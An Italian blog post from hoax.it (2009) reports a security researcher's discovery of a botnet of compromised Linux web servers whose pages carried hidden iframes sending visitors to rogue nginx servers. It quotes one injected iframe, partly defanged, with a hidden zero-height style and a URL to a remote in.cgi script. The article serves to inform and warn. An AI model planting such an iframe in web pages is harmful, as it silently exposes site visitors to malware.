Nuovo attacco ai server web Linux, botnet via iframe apache e nginx | WWW.HOAX.IT | Stop alle Bufale / Hoax e molto altro ancora.

Home
Exploits
Nuovo attacco ai server web Linux, botnet via iframe apache e nginx

Nuovo attacco ai server web Linux, botnet via iframe apache e nginx

Inserito da Silvio Passalacqua 15 Settembre, 2009

Si tratta di :Exploits

Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :

<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Tale tecnica non fa altro che aumentare le macchine zombie.

Cosa avviene in parole semplici :

i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo installato nginx potente server http e un mail proxy server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.

Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.

Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.

Correlati

Categories : Exploits Tags : alcuni, attacco, Botnet, computer, con, da, del, di, Gruppo, hosting, il, in, INFETTATI, interno del, la, linux, macchine, mail, malware, messo, nuovo, password, per, porta, rete, RUSSIA, scopo, server, servizi, Sicurezza, siti, siti web, successo, utenti, web

divisore

Commenti Via Facebook

Commenti lasciati dagli ospiti, senza usare Facebook

Commenti

Non ci sono commenti.

Inserisci un Commento

divisore

Ultime per Ogni Tematica

Appelli Generici: Kiwi pericolosissimi per la salute umana se associati con il consumo di vino rosso - Marzo 20th, 2016
Appelli Umanitari Veri: Raccolta Fondi per aiutare la piccola Chanel - Luglio 25th, 2013
avvenimenti: Fact-checking day, il 2 aprile a caccia della verità - Aprile 2nd, 2018
Award and Press: Silvio Passalacqua of www.hoax.it go to Campus Party Europa - Aprile 24th, 2010
Bufale e Hoax: Complotto UE contro l'Italia - Ottobre 12th, 2018
Catene di Sant'Antonio: Allerta: Finto buono spesa McDonald's di 50 euro via Whatsapp - Ottobre 21st, 2018
chainletters: salviette per i bambini Huggies con dentro i pezzi di vetro - Agosto 29th, 2015
Curiosità: Il vescovo benedice i cellulari contro le fake-news “Padre santo proteggi chi usa il cellulare” - Storia Vera - Febbraio 5th, 2018
English Articles: Vulnerability Summary for the Week of March 7, 2016 - Marzo 21st, 2016
Exploits: Vulnerabilità Chip Qualcomm e anche gli smartphone e tablet Android sono a rischio - Agosto 10th, 2016
hoax: Complotto UE contro l'Italia - Ottobre 12th, 2018
hoaxes: New Scam from Mr.Ahmed Bello - I NEED YOUR URGENT ASSISTANCE! - Marzo 25th, 2011
ICT and Computer Security: Vulnerability Summary for the Week of March 7, 2016 - Marzo 21st, 2016
ingegneria sociale: Bufala / Truffa, Finti premi e Vincite di Portatile o Smartphone o altri premi Google - Luglio 13th, 2016
Leggende Metropolitane: I comunisti mangiano i bambini... - Ottobre 31st, 2018
News: «Incappucciati picchiano di notte» Scatta l’indagine ma era una bufala - Febbraio 15th, 2017
news: Tea Party movement - Ottobre 15th, 2010
Phishing e Truffe: Allerta: Finto buono spesa McDonald's di 50 euro via Whatsapp - Ottobre 21st, 2018
sentenze: G.U.P. Tribunale di Brescia, Sentenza 3 marzo 2011 (dep. 30 marzo 2011), n. 293 - Aprile 25th, 2011
Sicurezza: Vulnerabilità Chip Qualcomm e anche gli smartphone e tablet Android sono a rischio - Agosto 10th, 2016
Storielle e Aneddoti: libera, liberi ma liberamente o no liberi di fare COSE LIBERAMENTE - Maggio 16th, 2010
Truffe Smascherate dalla Tv: Soluzione di un caso di truffe on line... Striscia la Notizia - Luglio 17th, 2008
Unsorted comments: relief fund worth 450.000.00 Pounds - Settembre 19th, 2011

© 2017 WWW.HOAX.IT | Stop alle Bufale / Hoax e molto altro ancora. Realizzato da Silvio Passalacqua | Hoax.it "la Bussola del web" © Contattaci per segnalazioni

HOAX.IT - si occupa di molte tematiche, non tratta soltanto bufale, quindi bisogna leggere ogni post del blog o articolo e capire, non è un grande sforzo. Hoax.it è principalmente un sito che elenca una serie di Bufale o Hoax, o Hoaxes. Si occupa di queste tematiche fin dal 1997 e ha cambiato più volte grafica e impaginazione. Siamo nel 2016 e si da un servizio in modo gratuito. Gli articoli sono di diversa natura, provengono da segnalazioni, oppure sono scritti dall'autore. Altre volte sono ripresi da altri siti citandone la fonte. Sei libero di "utilizzare gli articoli" ma è buona educazione citare il sito www.hoax.it e segnalarci link o articoli che parlano di Noi. Le indagini, l'aggiornamento del sito e la stessa gestione del sito richiedono molta, molta ponderazione, e qui nessuno è in caccia di "scoop" !

Alcune immagini possono arrivare da internet e per tale motivo ci sembrano di pubblico dominio, ma se riconosci qualche immagine o altro per il quale puoi vantare i diritti sul contenuto, o altro ti chiedo gentilmente di mandare una mail e chiedere la rimozione o qualche riferimento da aggiungere

QUI nessuno vuol danneggiare terzi e se ti senti tirato in ballo ingiustamente, provi fastidio per qualche contenuto puoi gentilmente farcelo sapere e se riterremo giuste le tue rtagioni provvederemo alla rimozione o a darti spazio sul sito per ribattere.

In questo sito puoi trovare più di una bufala, le bufale internet, è un immenso archivio non ci sono solo 2 bufale o 3 Bufale ma anche una serie di storie e aneddotti di Bufale e varie BUFALE SU INTERNET di ogni tipo, bufale non come le mozzarelle di bufala ma solo bufale e altro legato al mondo dell'informatica.. in inglese si chiamano hoax o meglio hoaxes se si tratta di Bufale... un archivio antibufala le bufale via internet a volte fanno ridere ma molte volte non c'è nulla da ridere esistono diverse sfumature questo sito hoax.it affronta questa complessa tematica le bufale via internet e i fenomeni correlati e non solo un servizio antibufala ma anche un collettore di esperienze, racconti, aneddoti, diffusione appelli umanitari e news dal web.. grazie per la visita...